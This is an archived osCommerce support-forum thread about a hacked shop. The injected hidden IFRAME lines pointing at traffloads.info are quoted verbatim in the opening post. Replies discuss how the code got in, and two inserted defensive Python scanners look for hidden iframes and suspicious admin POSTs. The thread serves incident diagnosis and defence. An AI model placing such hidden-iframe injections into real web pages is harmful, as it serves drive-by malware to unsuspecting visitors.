WEBSITE POSSIBLY HACKED!


Onstar

Posted

Hello everybody,

 

I am not sure what's going on. I will attempt to explain this as much as I can. For about a week now, I have been trying to find out why every computer I used downloaded a trojan as soon as the page loads up. I tried this on 4 different computers on 4 different networks. I tried one of them in a different state and zip code. I finally decided that there has been a hack.

 

Symptoms: As soon as the home page loads up, a virus called 'JS/Wonka' is detected. Also, while the page is loading up, if you look at the bottom of the page, you will see 'Opening page...www.websitemafia.com'. This domain quickly disappears as soon as the page loads up.

 

I was looking at the HTML source code via View->Source at the top of my Internet Explorer browser and I saw these lines:

 

 

<IFRAME src="http://www.traffloads.info/out.php?s_id=1" width=5 height=5 style="display:none"></IFRAME>

<IFRAME src="http://www.traffloads.info/out.php?s_id=1" width=5 height=5 style="display:none"></IFRAME>

<IFRAME src="http://www.traffloads.info/out.php?s_id=1" width=5 height=5 style="display:none"></IFRAME>

 

It looks like these lines of code are somewhere in one of my files. Could be the pages that load first. Maybe index.php or htm?

 

Does anybody know how to tackle this thing? I am not sure where to start. I really do need help.

 

My host said that my account is on *nix and that it is not possible to have this virus in it.

 

I will appreciate any help anyone is willing to give.

 

Thanks,

Onstar

Posted

It says that website cannot be found. Are you sure that is the correct web address?

Wade Morris

Amarillo, Texas

 

Before you do any changes on your site you need to do BACKUP! BACKUP!

Posted
It says that website cannot be found. Are you sure that is the correct web address?

 

Ok, I have an update. That <IFRAME......</IFRAME> is in includes/languages/english/index.php. I am not sure what this conceivably does. I believe that it has something to do with my problem based on things I found on Google. Does anyone think the same?

 

Please help.

Posted
Ok, I have an update. That <IFRAME......</IFRAME> is in includes/languages/english/index.php. I am not sure what this conceivably does.

if you didn't put it there, remove it.

 

 

I believe that it has something to do with my problem based on things I found on Google. Does anyone think the same?

osc doesn't use iframes, so you're probably correct

 

now you need to determine how they got into your site to paste their line of crap into the source code of your website. if you figure out how, do post and let all of us know so we can make sure we aren't taken advantage of also :)
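A way to check whether the same kind of line sits in other files, shown here as an added example that is not part of any post in this thread: it flags iframes that are hidden (display:none, or 5 pixels or smaller) and load from a host you do not own. The host names `shop.example` and `injected.example` and the sample file content are constructed.

```python
import os
import re
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
SCAN_EXT = (".php", ".html", ".htm", ".js", ".tpl")

def parse_attrs(tag):
    """Return the tag's attributes as a dict with lower-cased names."""
    return {m.group(1).lower(): m.group(2) or m.group(3) or m.group(4) or ""
            for m in ATTR_RE.finditer(tag)}

def is_hidden(attrs):
    """True for display:none / visibility:hidden or a width/height of 5 or less."""
    style = attrs.get("style", "").replace(" ", "").lower()
    sizes = (re.match(r"\d+", attrs.get(d, "")) for d in ("width", "height"))
    return ("display:none" in style or "visibility:hidden" in style
            or any(s and int(s.group()) <= 5 for s in sizes))

def suspicious_iframes(text, own_hosts):
    """List (line, host) for hidden iframes loading from a host not in own_hosts."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(0))
        host = (urlparse(attrs.get("src", "")).hostname or "").lower()
        if host and host not in own_hosts and is_hidden(attrs):
            hits.append((text.count("\n", 0, m.start()) + 1, host))
    return hits

def scan_tree(root, own_hosts):
    """Walk a web root and report (relative path, line, host) for each hit."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_EXT):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1") as fh:
                    hits = suspicious_iframes(fh.read(), own_hosts)
                found += [(os.path.relpath(path, root), ln, h) for ln, h in hits]
    return sorted(found)

# Constructed sample: a language file with an injected line shaped like the one above
SAMPLE = ("<?php\ndefine('HEADING_TITLE', 'Welcome');\n?>\n"
          '<IFRAME src="http://injected.example/out.php?s_id=1" '
          'width=5 height=5 style="display:none"></IFRAME>\n'
          '<iframe src="http://shop.example/map.html" width=400 height=300></iframe>\n')

if __name__ == "__main__":
    print(suspicious_iframes(SAMPLE, {"shop.example"}))
```

Run `scan_tree` against a downloaded copy of the whole catalog directory, and compare any file it reports with a clean copy from the original osCommerce package.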

Posted
if you didn't put it there, remove it.

osc doesn't use iframes, so you're probably correct

 

now you need to determine how they got into your site to paste their line of crap into the source code of your website. if you figure out how, do post and let all of us know so we can make sure we aren't taken advantage of also :)

 

 

I will try and find out how they got in. I would like any suggestions on things to look into to determine method of entry. I guess my question remains: is the reason for pasting the code only to infect computers?

 

How does the iframe stuff relate to the webmastermafia.com that was showing up on the lower window pane when the page was loading up?

Posted
I will try and find out how they got in. I would like any suggestions on things to look into to determine method of entry. I guess my question remains: is the reason for pasting the code only to infect computers?

 

How does the iframe stuff relate to the webmastermafia.com that was showing up on the lower window pane when the page was loading up?

 

 

Ok on what website webmastermafia.com or websitemafia.com?

Wade Morris

Amarillo, Texas

 

Before you do any changes on your site you need to do BACKUP! BACKUP!

Posted

I would recommend not going to any of the URLs posted here - a vulnerable computer can easily be destroyed (yes really) by visiting this type of site.

 

Most likely somebody has managed to get in through your osCommerce admin and use the 'define languages' option to insert the iframe. This 'feature' is rarely used and should be disabled/removed from the osCommerce package, along with the file manager.

 

Raoul

Posted
I will try and find out how they got in. I would like any suggestions on things to look into to determine method of entry.

check your raw access logs to see if there's any peculiar activity (if you have cpanel, you can download them from there)

 

 

I guess my question remains: is the reason for pasting the code only to infect computers?

 

How does the iframe stuff relate to the webmastermafia.com that was showing up on the lower window pane when the page was loading up?

more than likely it's just to infect or steal something from your visitor. the only way to know for sure is to do a search for the virus name and see what it does (usually Symantec's site has such descriptions)

 

the loading from the mafia thingy site is probably from encoded code into the virus, maybe grabbing something from their site to try and inject to the visitor. search their name as well and see if anyone else is talking about what they do or how they got into the victim's site. i certainly wouldn't visit the offending site though.

 

 

do you have the most recent security fixes (from november 05) installed? if not, head to the announcements forum and get them
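What "peculiar activity" in the raw access logs can look like for the entry route suggested earlier in the thread (the admin 'define languages' tool and the file manager), as an added example that is not part of any post here. It assumes the logs are in Apache combined format and that the two tools are served by scripts named `define_language.php` and `file_manager.php`; the log lines, IP addresses and query strings are constructed.

```python
import re
from collections import defaultdict

# Apache combined log format (assumed format of the downloaded raw access log)
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')

# Assumed script names for the admin tools named in the thread; adjust to your install
WATCHED = ("define_language.php", "file_manager.php")

def admin_writes(lines, watched=WATCHED):
    """Group accepted POSTs (2xx/3xx) to the watched admin scripts by client IP."""
    by_ip = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        script = m["path"].split("?", 1)[0].rsplit("/", 1)[-1]
        if script in watched and m["status"][0] in "23":
            by_ip[m["ip"]].append((m["ts"], m["path"]))
    return dict(by_ip)

# Constructed log lines (documentation IP ranges, illustrative query strings)
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Mar/2006:04:11:09 -0600] "GET /catalog/index.php HTTP/1.1" '
    '200 18211 "-" "Mozilla/4.0"',
    '203.0.113.45 - - [02/Mar/2006:04:12:31 -0600] "GET /catalog/admin/define_language.php '
    'HTTP/1.1" 200 9120 "-" "Mozilla/4.0"',
    '203.0.113.45 - - [02/Mar/2006:04:12:58 -0600] "POST /catalog/admin/define_language.php'
    '?action=save HTTP/1.1" 302 - "-" "Mozilla/4.0"',
    '198.51.100.7 - - [02/Mar/2006:04:15:00 -0600] "POST /catalog/checkout_payment.php '
    'HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for ip, events in admin_writes(SAMPLE_LOG).items():
        print(ip, events)
```

Any address in the result that is not your own is worth following through the rest of the log, starting with its first request to the admin directory.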

Posted
check your raw access logs to see if there's any peculiar activity (if you have cpanel, you can download them from there)

more than likely it's just to infect or steal something from your visitor. the only way to know for sure is to do a search for the virus name and see what it does (usually Symantec's site has such descriptions)

 

the loading from the mafia thingy site is probably from encoded code into the virus, maybe grabbing something from their site to try and inject to the visitor. search their name as well and see if anyone else is talking about what they do or how they got into the victim's site. i certainly wouldn't visit the offending site though.

do you have the most recent security fixes (from november 05) installed? if not, head to the announcements forum and get them

 

 

Hello Eww,

 

can you tell me what the security fixes were, please? or post a link?

 

Thank you.

Archived

This topic is now archived and is closed to further replies.
